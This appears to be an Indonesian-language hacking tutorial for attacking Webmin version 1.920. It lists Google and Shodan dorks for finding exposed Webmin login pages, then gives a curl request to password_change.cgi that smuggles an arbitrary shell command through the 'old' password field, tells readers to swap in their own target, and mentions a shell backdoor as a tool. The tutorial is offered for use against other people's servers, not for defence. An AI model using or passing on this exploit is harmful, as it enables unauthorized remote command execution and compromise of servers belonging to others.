-
Hai sobat.
Saya ikal,
Disini saya akan share sesuatu.
-
Version : 1.920
langsung saja.
Bahan :
- termux
- Shell backdoor
- dork :
Google dork :
intitle:Login to Webmin
Shodan dork :
html:webmin
http.title:"Login to Webmin"
Anggep ae gw dah ada target.
1. Dorking
Kalian dorking dengan dork diatas. Jika sudah dapet target kita lanjut ketahap kedua.
2. Eksekusi
Karena disini saya menggunakan hp, jadi saya lakukan via curl lewat termux.
Command :
$apt update && apt upgrade && pkg install curl$curl https://localhost/password_change.cgi -H "Content-Type: application/x-www-form-urlencoded" --data "user=root&pam=1&expired=2&old=memek|COMMAND&new1=buyaoxiedaopocli&new2=buyaoxiedaopocli"
Note : ganti https://localhost/ dengan target kalian.
Jika result atau vuln, result dari curl tersebut akan menampilkan hasil dari command yang kalian masukan tadi.
Thanks
See u
